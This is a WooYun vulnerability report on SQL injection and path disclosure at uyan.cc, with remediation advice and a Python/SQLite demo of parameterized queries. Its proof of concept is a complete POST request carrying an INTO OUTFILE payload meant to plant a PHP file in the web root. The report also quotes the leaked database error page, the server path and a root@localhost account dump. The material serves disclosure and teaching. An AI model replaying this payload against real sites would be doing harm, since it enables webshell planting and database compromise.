
Vulnerability summary (24 followers)

Defect ID: wooyun-2011-03063

Title: Youyan (http://uyan.cc) has SQL injection and file path disclosure issues

Vendor: Youyan

Author: cr0_3

Submitted: 2011-10-21 10:24

Fix date: 2011-10-21 13:39

Published: 2011-10-21 13:39

Type: SQL injection

Severity: Medium

Self-assessed Rank: 6

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2011-10-21: Actively contacting the vendor and awaiting acknowledgement; details not disclosed publicly
2011-10-21: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

http://uyan.cc is a newly founded social-commenting startup; its SQL input filtering is lax, which leads to this vulnerability.

Detailed description:

http://uyan.cc/index.php/youyan_content/getRepliesTogether/time does not filter the data POSTed to it: the comment_ids[] values go straight into a SQL query. In addition, http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8% leaks the server's filesystem path; the database error page in the proof below likewise prints the absolute path /opt/lampstack-5.3.6-0/apache2/htdocs/ along with the failing query.
Writing a webshell directly with INTO OUTFILE proved difficult, however. The report attributes this to the database and web server being separated; the author's own comment below revises that to a directory restriction on OUTFILE (the user()/version()/datadir output quoted there shows root@localhost with the data directory under the same /opt/lampstack-5.3.6-0 tree).

Proof of vulnerability:

POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1
Host: uyan.cc
Connection: keep-alive
Content-Length: 723
Origin: http://uyan.cc
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&&%20'1'='2&master_id=2711%20&&%201=2&title=''''''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444
comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '11111' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&reply_page_no%5B167967%5D=0&reply_page_no%5B167985%5D=0&reply_page_no%5B167986%5D=0&reply_page_no%5B167987%5D=0&reply_page_no%5B168006%5D=0&reply_page_no%5B168007%5D=0&reply_page_no%5B168019%5D=0&reply_page_no%5B168020%5D=0&reply_page_no%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com


<body>
<div id="content">
<h1>A Database Error Occurred</h1>
<p>Error Number: 1064</p><p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1=1 order by comment.time desc limit 0, 3' at line 3</p><p>select user.*, comment.* from comment
LEFT JOIN user ON user.user_id = comment.user_id
where comment.del=0 and comment.reply_to_comment_id=168031 and '1=1 order by comment.time desc limit 0, 3</p><p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p><p>Line Number: 251</p> </div>
</body>
</html>

Fix recommendation:

Validate and filter every user-submitted parameter before it reaches SQL (comment_ids[] values and reply_page_no[] keys are integers and should be cast or rejected; everything else should be passed as bound parameters), and turn off detailed database error output in production, since the error page above discloses the full query text and the absolute path /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php. The error page layout ("A Database Error Occurred", "Filename:", "Line Number:") is CodeIgniter's database error template; there the switch is db_debug in the database configuration, which should be FALSE on a production host.
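The injection and the fix side by side, as an added example that is not the site's code (the site is PHP; this is Python with an in-memory SQLite database standing in for MySQL). The query text and the table and column names are taken from the leaked error message; the rows, the shortened POST body and the helper names (parse_php_form, validate_ids, safe_replies) are constructed for illustration:

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# --- 1. Parse the POST body the way PHP's $_POST does ---------------------
# name=value pairs; name[] appends to a list, name[key] fills a dict.
def parse_php_form(body):
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        name, value = unquote_plus(raw_name), unquote_plus(raw_value)
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", name)
        if m is None:
            fields[name] = value
        elif m.group(2) == "":
            fields.setdefault(m.group(1), []).append(value)
        else:
            fields.setdefault(m.group(1), {})[m.group(2)] = value
    return fields

# Constructed sample body, modelled on the report's proof-of-concept but
# shortened; the second comment_ids[] element carries the injection.
SAMPLE_BODY = (
    "comment_ids%5B%5D=168019"
    "&comment_ids%5B%5D=168031 and (select '11111' into outfile "
    "'//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1"
    "&comment_ids%5B%5D=168020"
    "&reply_page_no%5B168019%5D=0&reply_page_no%5B168031%5D=0"
    "&reply_page_no%5B168020%5D=0&session_name=uyan_www.36kr.com"
)

# --- 2. The query the error page leaked, in both forms ---------------------
# Table and column names come from the leaked query; the rows are made up.
REPLIES_SQL = (
    "select user.*, comment.* from comment "
    "LEFT JOIN user ON user.user_id = comment.user_id "
    "where comment.del=0 and comment.reply_to_comment_id={} "
    "order by comment.time desc limit 0, 3"
)
REPLIES_SQL_PARAM = REPLIES_SQL.replace("{}", "?")

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table user(user_id integer primary key, name text);
        create table comment(comment_id integer primary key, user_id integer,
            reply_to_comment_id integer, del integer, time integer, body text);
        insert into user values (1, 'alice'), (2, 'bob');
        insert into comment values
            (168031, 1, 0,      0, 100, 'top-level'),
            (168040, 2, 168031, 0, 101, 'reply one'),
            (168041, 1, 168031, 0, 102, 'reply two'),
            (168042, 2, 168031, 1, 103, 'deleted reply');
    """)
    return conn

def vulnerable_replies(conn, raw_id):
    """String-interpolates the form value, as the leaked query shows the site doing."""
    return conn.execute(REPLIES_SQL.format(raw_id)).fetchall()

def safe_replies(conn, comment_id):
    """Bound parameter: the value can never become SQL syntax."""
    return conn.execute(REPLIES_SQL_PARAM, (comment_id,)).fetchall()

# --- 3. Input validation for the hardened handler --------------------------
ID_RE = re.compile(r"[1-9][0-9]{0,17}")  # plain positive integer, nothing else

def validate_ids(values):
    """Return comment ids as ints, or raise ValueError before any SQL runs."""
    ids = []
    for v in values:
        if not ID_RE.fullmatch(v):
            raise ValueError("bad comment id: %r" % v[:40])
        ids.append(int(v))
    return ids

def demo(body=SAMPLE_BODY):
    """Run the vulnerable and hardened paths over the body; returns outcomes."""
    form = parse_php_form(body)
    conn = make_db()
    out = {}
    try:                                   # vulnerable: the injected element
        for raw in form["comment_ids"]:    # becomes SQL and breaks the query,
            vulnerable_replies(conn, raw)  # like the 1064 error the site echoed
        out["vulnerable"] = "ran"
    except sqlite3.OperationalError as e:
        out["vulnerable"] = "sql error: " + str(e)
    try:                                   # hardened: rejected before any query
        validate_ids(form["comment_ids"])
        out["hardened"] = "accepted"
    except ValueError as e:
        out["hardened"] = "rejected: " + str(e)
    # Binding alone also neutralises the payload (it is just a non-numeric
    # string that matches no row), but validation gives a clear 400 instead.
    out["parameterized_raw"] = len(safe_replies(conn, form["comment_ids"][1]))
    out["clean_reply_count"] = len(safe_replies(conn, 168031))
    return out

if __name__ == "__main__":
    print(demo())
```

Running it shows three things worth checking: the PHP-style body parser expands comment_ids[] into a list whose second element is the payload; feeding that element into the interpolated query raises a syntax error at `into` (SQLite's counterpart of the MySQL 1064 the site echoed back); and the hardened path rejects the request before touching the database. On the INTO OUTFILE attempt itself, MySQL creates the file as the mysqld OS user, requires the FILE privilege, and honours secure_file_priv, so the target directory under the web root has to be writable by mysqld and not excluded by that setting before the step yields a shell; the author's comment below attributes the failure to such a directory restriction rather than to a separate database host.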

Copyright notice: please credit cr0_3@WooYun when reposting.


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused.



Comments:

  1. 2011-10-21 15:34 | cr0_3 ( Passer-by | Rank:8 Vulns:3 | just do it.)

    It's not that the DB and the web server are separated; outfile must have a directory permission restriction set. root@localhost5.1.56unknown-linux-gnuyouyan/opt/lampstack-5.3.6-0/mysql/data/

  2. 2011-10-21 18:22 | xsser Verified white hat ( Regular white hat | Rank:254 Vulns:18 | When I look back on it all, will this world be good?)

    Better to wait for the official explanation.

  3. 2012-08-12 11:41 | Vty ( Regular white hat | Rank:199 Vulns:37 )

    @cr0_3 Nice.